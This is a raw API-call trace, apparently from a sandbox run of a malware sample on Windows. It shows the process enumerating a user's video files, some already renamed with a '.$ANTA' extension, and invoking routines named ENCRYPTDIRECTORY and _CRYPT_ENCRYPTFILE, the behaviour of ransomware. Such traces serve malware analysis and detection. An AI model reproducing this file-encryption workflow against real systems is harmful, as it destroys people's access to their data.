returned 1 [0107.769] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e330 | out: lpFindFileData=0x144e330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbcbca4, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xbbcbca4, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xbc6466e, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xd1a0, dwReserved0=0x144e828, dwReserved1=0x8, cFileName="u5YsBEddaGYJI-.swf.$ANTA", cAlternateFileName="U5YSBE~1.$AN")) returned 1 [0107.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0107.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0107.770] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e330 | out: lpFindFileData=0x144e330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc470559, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xc470559, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xc4bca56, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xbdc0, dwReserved0=0x144e828, dwReserved1=0x8, cFileName="vBQeWbI.swf.$ANTA", cAlternateFileName="VBQEWB~1.$AN")) returned 1 [0107.770] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e330 | out: lpFindFileData=0x144e330*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e29a0, ftCreationTime.dwHighDateTime=0x144e690, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e29a0, ftLastWriteTime.dwLowDateTime=0x43e9818, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144e828, dwReserved1=0x8, cFileName="", cAlternateFileName="Ǩнńဓ+\x10")) returned 0 [0107.770] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0107.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0107.770] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0107.770] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0107.770] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\tr4gqm")) returned 0x10 [0107.770] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\*", lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c1344d0, ftCreationTime.dwHighDateTime=0x1d5e0cc, ftLastAccessTime.dwLowDateTime=0x94b072b0, ftLastAccessTime.dwHighDateTime=0x1d5eacb, ftLastWriteTime.dwLowDateTime=0x94b072b0, ftLastWriteTime.dwHighDateTime=0x1d5eacb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca640, cFileName=".", cAlternateFileName="")) returned 0x41ac780 [0107.770] FindNextFileW (in: hFindFile=0x41ac780, lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c1344d0, ftCreationTime.dwHighDateTime=0x1d5e0cc, ftLastAccessTime.dwLowDateTime=0x94b072b0, ftLastAccessTime.dwHighDateTime=0x1d5eacb, ftLastWriteTime.dwLowDateTime=0x94b072b0, ftLastWriteTime.dwHighDateTime=0x1d5eacb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca640, cFileName="..", cAlternateFileName="")) returned 1 [0107.770] FindNextFileW (in: hFindFile=0x41ac780, lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb89a0da0, ftCreationTime.dwHighDateTime=0x1d5eeb6, ftLastAccessTime.dwLowDateTime=0xc72d3200, ftLastAccessTime.dwHighDateTime=0x1d5ec7e, ftLastWriteTime.dwLowDateTime=0xc72d3200, ftLastWriteTime.dwHighDateTime=0x1d5ec7e, nFileSizeHigh=0x0, nFileSizeLow=0x103a0, dwReserved0=0x0, dwReserved1=0x43ca640, cFileName="Cu3r8FST64g6XD.flv", cAlternateFileName="CU3R8F~1.FLV")) returned 1 [0107.771] FindNextFileW (in: hFindFile=0x41ac780, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29a8b2c0, ftCreationTime.dwHighDateTime=0x1d5e85a, ftLastAccessTime.dwLowDateTime=0x5dbb9c00, ftLastAccessTime.dwHighDateTime=0x1d5e858, ftLastWriteTime.dwLowDateTime=0x5dbb9c00, ftLastWriteTime.dwHighDateTime=0x1d5e858, nFileSizeHigh=0x0, nFileSizeLow=0x135eb, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="DU9VQvjn.swf", cAlternateFileName="")) returned 1 [0107.771] FindNextFileW (in: hFindFile=0x41ac780, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x120192a0, ftCreationTime.dwHighDateTime=0x1d5e27d, ftLastAccessTime.dwLowDateTime=0xe49685f0, ftLastAccessTime.dwHighDateTime=0x1d5e597, ftLastWriteTime.dwLowDateTime=0xe49685f0, ftLastWriteTime.dwHighDateTime=0x1d5e597, nFileSizeHigh=0x0, nFileSizeLow=0x10503, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="recAT1.mkv", cAlternateFileName="")) returned 1 [0107.771] FindNextFileW (in: hFindFile=0x41ac780, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e2830, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0x1a, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c3570, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="ﶰмńဓ+\x10")) returned 0 [0107.771] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0107.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|Cu3r8FST64g6XD.flv|DU9VQvjn.swf|recAT1.mkv", cchCount1=43, lpString2="", cchCount2=0) returned 3 [0107.771] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0107.771] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\Cu3r8FST64g6XD.flv", lpFindFileData=0x144e970 | out: lpFindFileData=0x144e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb89a0da0, ftCreationTime.dwHighDateTime=0x1d5eeb6, ftLastAccessTime.dwLowDateTime=0xc72d3200, ftLastAccessTime.dwHighDateTime=0x1d5ec7e, ftLastWriteTime.dwLowDateTime=0xc72d3200, ftLastWriteTime.dwHighDateTime=0x1d5ec7e, nFileSizeHigh=0x0, nFileSizeLow=0x103a0, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="Cu3r8FST64g6XD.flv", cAlternateFileName="CU3R8F~1.FLV")) returned 0x41ac500 [0107.771] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0107.771] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0107.771] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0107.771] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0107.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0107.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca808, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0107.772] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\Cu3r8FST64g6XD.flv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\tr4gqm\\cu3r8fst64g6xd.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0107.772] FreeLibrary (hLibModule=0x772d0000) returned 1 [0107.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0107.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eab80 [0107.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0107.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0107.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0107.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0107.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0107.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0107.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0107.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0107.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0107.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0107.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0107.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0107.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0107.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0107.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0107.773] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0107.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0107.773] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0107.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0107.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0107.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0107.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0107.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0107.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0107.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0107.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0107.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0107.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0107.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0107.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0107.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0107.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0107.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0107.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0107.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0107.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0107.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0107.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0107.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0107.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0107.773] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0107.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0107.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0107.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0107.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0107.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0107.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0107.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0107.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0107.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0107.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0107.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0107.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0107.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0107.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0107.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0107.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0107.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0107.774] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0107.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0107.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0107.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0107.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4f0 [0107.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca4f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0107.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0107.775] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0107.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0107.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0107.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0107.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0107.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0107.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0107.775] CloseHandle (hObject=0x258) returned 1 [0107.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0107.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0107.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0107.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0107.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0107.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0107.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0107.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0107.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0107.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0107.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0107.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0107.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0107.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0107.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0107.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0107.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0107.776] FreeLibrary (hLibModule=0x772d0000) returned 1 [0107.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0107.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0107.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0107.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0107.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0107.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0107.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0107.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0107.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0107.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0107.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0107.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0107.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0107.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0107.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0107.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0107.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0107.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0107.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0107.776] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0107.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0107.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0107.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0107.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0107.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0107.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0107.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0107.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0107.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0107.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0107.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0107.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0107.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0107.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0107.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0107.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0107.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0107.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0107.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0107.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0107.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0107.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0107.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0107.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0107.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0107.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0107.777] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0107.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0107.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0107.777] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0107.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0107.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0107.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0107.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2850 [0107.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0107.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0107.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0107.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0107.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0107.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27b0 [0107.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0107.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0107.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0107.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0107.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 